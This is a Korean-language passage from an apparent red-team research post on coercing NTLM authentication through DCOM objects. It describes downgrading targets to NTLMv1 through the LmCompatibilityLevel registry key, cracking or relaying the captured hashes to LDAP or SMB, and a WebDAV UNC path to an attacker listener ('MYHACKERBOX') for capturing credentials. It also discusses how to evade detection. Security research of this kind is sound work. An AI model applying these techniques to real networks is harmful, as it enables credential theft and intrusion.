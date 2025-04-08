이제 DCOM 객체를 세션 하이재킹 도구로 변환할 수 있다는 것을 알았으므로, 다음 단계는 하이재킹을 완료하는 데 활용할 수 있는 메서드와 속성을 식별하는 것입니다. 이 연구를 위해 저는 대부분의 공개 DCOM 수평 이동 기술과는 다른 접근 방식을 사용하여 페이로드를 실행하지 않고도 사용자 침해를 달성할 수 있는지 살펴보았습니다.

저는 대상 시스템에서 페이로드를 전송하거나 실행할 필요가 없는 '파일리스' 형식으로 비슷한 결과를 얻는 데 중점을 두었습니다. 대상 시스템에서 페이로드를 전송하고 실행하는 것은 종종 레드팀 운영에서 '비용이 많이 드는' 작업으로 간주되기 때문에 이 구분이 중요합니다. 이 단계를 피하면 일반적인 보안 제어가 트리거될 위험이 크게 줄어듭니다. 따라서 DCOM을 통해 NTLM 인증을 강제하여 원격 사용자 계정을 손상시키는 것을 목표로 했습니다.

기존의 수평 이동 기술을 수행하는 것보다 NTLM 인증을 강제하면 다음과 같은 몇 가지 주요 이점이 있습니다.

NTLMv1/NTLMv2 해시를 캡처하고 오프라인에서 크랙을 시도합니다.

영향을 받는 사용자로서 작업을 수행하기 위해 NTLMv1 또는 WebDAV NTLMv2 해시를 LDAP 또는 SMB와 같은 다른 네트워크 서비스에 전달합니다.

일반적으로 보안 도구에서 더 많은 조사를 받는 대상 시스템에서 페이로드를 전송하고 실행하는 것을 피합니다.

LSASS 프로세스를 건드리지 않도록 하여 탐지 위험을 줄입니다.

이 글을 쓰는 현재, 대부분의 도메인 컨트롤러에서는 LDAP 서명 및 채널 바인딩이 필요하지 않으며 기본적으로 적용됩니다. 이러한 보안 기능은 Windows Server 2025에서만 필수입니다. 즉, 대상 시스템에서 NTLMv1 또는 WebDAV 인증을 강제할 수 있는 경우 이를 LDAP로 릴레이하고 영향을 받는 사용자로 작업을 수행할 수 있습니다. 마찬가지로 도메인 컨트롤러를 제외한 Windows 서버에서는 기본적으로 SMB 서명이 필요하지 않습니다.

또 다른 중요한 고려 사항은 2024년 12월 현재 Nic Losby가 공개적으로 공유한 레인보우 테이블을 사용하여 NTLMv1 해시를 간단하게 크랙할 수 있다는 점입니다. 이러한 테이블을 사용하면 NTLMv1 해시에서 자격 증명을 복구하는 데 필요한 시간과 노력을 크게 줄일 수 있습니다. NTLMv2 해시 대신 NTLMv1 해시를 얻기 위해 대상 시스템에서 다음 레지스트리 키를 수정합니다.

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

LmCompatibilityLevel을 2 이하의 값으로 설정하면 시스템이 인증을 위해 NTLMv1로 폴백합니다. 이러한 수정은 로컬 관리자 권한으로 가능하며 일반적으로 "NetNTLMv1 다운그레이드 공격"이라고 합니다.

또는 HTTP 기반 인증을 이 서비스로 전달할 수 있으므로 WebDAV 인증을 캡처하여 LDAP로 전달할 수 있습니다. WebClient 서비스가 아직 권한 있는 액세스로 실행되고 있지 않은 경우 대상 시스템에서 원격으로 활성화할 수 있습니다. 활성화되면 UNC 경로에 시스템의 NetBIOS 이름을 지정하여 리스너에 WebDAV NTLM 인증을 강제할 수 있습니다. 예를 들면 다음과 같습니다.

\\MYHACKERBOX@80\giveme\creds.txt

NTLM 릴레이 공격 및 다른 엔드포인트로 릴레이할 수 있는 프로토콜에 대한 자세한 내용은 여기에서 다음 리소스를 참조하세요.